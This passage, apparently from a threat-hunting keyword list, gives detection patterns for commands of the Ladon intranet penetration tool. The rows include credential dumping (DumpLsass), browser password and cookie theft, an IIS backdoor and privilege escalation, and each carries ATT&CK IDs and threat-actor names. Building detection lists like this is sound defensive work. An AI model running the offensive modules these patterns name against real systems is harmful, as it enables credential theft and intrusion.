T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon DraytekExp*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon DumpLsass*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon EnableDotNet*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon EnumProcess*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon EnumShare*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon Exploit*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon FindIP *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon FirefoxCookie*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon FirefoxHistory*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon FirefoxPwd*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon ForExec *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon FtpDownLoad *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon FtpServer *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon GetDomainIP*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon gethtml *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon GetPipe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon GetSystem*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon IISdoor*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon IISpwd*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon MssqlCmd *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 